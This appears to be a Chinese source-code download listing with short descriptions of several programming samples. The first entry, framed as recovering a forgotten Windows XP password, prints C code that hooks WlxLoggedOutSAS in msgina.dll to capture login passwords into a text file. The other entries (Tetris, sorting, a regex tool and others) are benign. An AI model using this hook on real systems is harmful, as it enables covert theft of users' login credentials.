-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
VC摹仿手写字的源码。大家来看看,共同探讨。
VC摹仿手写字的源码。大家来看看,共同探讨。-VC imitate handwritten word source. You see, and explore together.
- 2022-01-25 22:22:58下载
- 积分:1
-
can view the body of the window controls and attributes of the handle!
可以查看窗体内各控件的句柄和属性!-can view the body of the window controls and attributes of the handle!
- 2022-05-05 00:45:49下载
- 积分:1
-
这是一个VB做的小程序,可以用各种语言写的计算器程序来对比其效率。...
这是一个VB做的小程序,可以用各种语言写的计算器程序来对比其效率。-This is a VB to do a small program can be written in various languages calculator program to compare its efficiency.
- 2022-04-14 16:12:33下载
- 积分:1
-
正则表达式学习的一个小工具和源码.
正则表达式学习的一个小工具和源码....
正则表达式学习的一个小工具和源码.
正则表达式学习的一个小工具和源码.-Regular Expression Tutorial
- 2022-01-25 22:08:55下载
- 积分:1
-
WinsCard dll,它将发送和接收 APDU 命令的智能卡。
WinsCard dll,它将发送和接收 APDU 命令的智能卡。
在 C 原始 SmartCardIO
由安德鲁 · 费尔南德斯
- 2022-05-18 14:15:29下载
- 积分:1
-
俄罗斯方块,简单的程序,编译通过代码完整
俄罗斯方块,简单的程序,编译通过代码完整-Russian box, simple procedures, the compiler through the code integrity
- 2022-02-04 05:56:40下载
- 积分:1
-
内部查找与排序算法,这个是排序的一个非常重要的算法,自己编的,有很多不足,希望大家发表意见!...
内部查找与排序算法,这个是排序的一个非常重要的算法,自己编的,有很多不足,希望大家发表意见!-internal search and sorting algorithm, this is sort of a very important algorithm own series, there are many deficiencies in the hope that your views!
- 2022-03-05 23:30:56下载
- 积分:1
-
对复数进行+、
对复数进行+、-、*、/重载运算-right plural for ,-,*,/ Heavy Operational
- 2023-01-28 20:00:08下载
- 积分:1
-
这是一个关于多线程开发的例子,提供了比较详细的多线程开发的方法....
这是一个关于多线程开发的例子,提供了比较详细的多线程开发的方法.-it is a example about multi_thread developing, providing detail multi-thread developing methods.
- 2022-03-01 05:15:14下载
- 积分:1